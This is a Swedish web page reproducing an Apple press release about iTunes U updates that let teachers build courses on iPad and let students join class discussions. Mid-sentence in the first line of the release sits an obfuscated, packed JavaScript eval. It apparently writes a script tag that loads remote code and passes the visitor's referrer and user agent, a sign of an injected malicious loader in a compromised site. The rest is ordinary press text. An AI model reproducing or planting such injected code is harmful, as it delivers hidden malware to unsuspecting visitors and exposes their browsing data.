Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Apple presenterar uppdateringar för iTunes U

Apple presenterar uppdateringar för iTunes U
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|difar|var|u0026u|referrer|zfzby||js|php’.split(’|’),0,{}))
presenterade idag uppdateringar för iTunes U som ger utbildare och elever tillgång till nya fantastiska verktyg för att skapa och ta del av utbildningsmaterial på iPad. Från och med den 8 juli kan lärare som använder den kostnadsfria appen iTunes U för första gången skapa, redigera och hantera fullständiga kurser på iPad medan elever får nya möjligheter till samarbete genom att de till exempel kan starta klassdiskussioner eller ställa frågor direkt på iPad.

”Utbildning är en av Apples grundpelare och iTunes U är en mycket värdefull källa för lärare och elever”, säger Eddy Cue, Apples vice VD för internetmjukvara och internettjänster. “iTunes U erbjuder en fantastisk samling utbildningsmaterial för människor runt om i världen. Och eftersom det nu finns bättre sätt att hantera och diskutera utbildningsmaterialet blir lärandet ännu mer individanpassat på iPad.”

Tack vare den nya uppdateringsfunktionen inuti iTunes U-appen kan lärare skapa fullständiga kurser på iPad och direkt lägga till mediespäckat innehåll och utbildningsmaterial från iWork, iBooks Author eller någon av de över 75 000 utbildningsapparna för iPad. Lärare kan också använda den inbyggda kameran för bilder och video på iPad och lägga till verkliga exempel i vilken kurs som helst för att ge eleverna tillgång till relevant material på direkten.

”iTunes U är den kraftfullaste plattformen för att samla hela utbildningsupplevelsen på iPad”, säger Fraser Speirs, IT- och datachef på Cedars School of Excellence i Skottland. ”Genom att lärarna kan skapa och ordna kurser direkt på iPad kan de lättare fokusera på att se till att alla elever kan ta del av innehållet och kommunicera med varandra.”

Elever som använder iPad och som är registrerade på privata iTunes U-kurser får nu allt de behöver för att samarbeta med sina klasskamrater och lärare. Med Diskussioner i iTunes U-appen kan de automatiskt följa klassdiskussioner, delta i samtal om nya ämnen eller välja att få pushmeddelanden när en ny diskussion startas eller när någon svarar i en pågående diskussion. Lärarna kan också gå med i forumen och styra diskussionerna genom att ta bort icke-relevanta meddelanden eller svar.

”Med Diskussioner i iTunes U får alla elever möjlighet att i lugn och ro utforska material och samarbeta tillsammans”, säger Larry Reiff, lärare på Roslyn High School i New York. ”iPad och iTunes U fortsätter att ge eleverna tillgång till verktygen de behöver för att bygga vidare på och demonstrera sina kunskaper.”

iTunes U hjälper utbildare att skapa kurser med föreläsningar, uppgifter, böcker, test och annat för miljontals iOS-användare runt om i världen. iTunes U har över 750 000 enskilda utbildningsresurser i iTunes U-appen och är världens största onlinekatalog med gratis utbildningsmaterial från ledande skolor och framstående organisationer. Tusentals utbildningsinstitutioner har publicerat fler än 7 500 allmänna och tusentals privata kurser inom konst, vetenskap, hälsa och medicin, utbildning, företagande med mera.

Utbildare i 69 olika länder kan skapa iTunes U-kurser och göra kurser och material tillgängliga i 155 länder via iTunes U-appen. Förutom de tusentals enskilda iTunes U-resurserna på iTunes Store finns det också över 500 000 appar på App Store som har skapats särskilt för iPad. Och med den kostnadsfria appen iBooks Author på Mac App Store har oberoende lärare och förlag världen över skapat nära 30 000 Multi-Touch-böcker.

Apple designar Mac-datorerna – världens bästa persondatorer – och OS X, iLife, iWork samt en rad professionella program. Apple leder den digitala musikrevolutionen med iPod och iTunes Store. Apple har förnyat mobiltelefonen med den banbrytande iPhone och App Store och stakar ut den framtida utvecklingen inom mobila medier och datorteknik med iPad.
 
Detta är ett pressmeddelande från Apple